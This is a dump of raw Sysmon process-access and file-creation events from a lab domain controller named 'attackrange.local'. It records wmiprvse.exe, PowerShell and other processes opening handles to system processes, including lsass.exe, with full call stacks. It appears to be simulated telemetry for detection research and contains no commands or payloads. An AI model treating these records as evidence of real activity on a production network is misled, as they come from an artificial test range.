RT4.dll+111bc 10341000x80000000000000002238796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D98-603E-9EAA-00000000AD01}109614040C:\Windows\system32\conhost.exe{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.592{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x80000000000000002238779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.575{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0e35fkqe.cmt.ps12021-03-02 16:53:44.575 10341000x80000000000000002238778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.575{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-9EAA-00000000AD01}1096C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.575{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.575{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.575{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.575{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.575{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.575{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 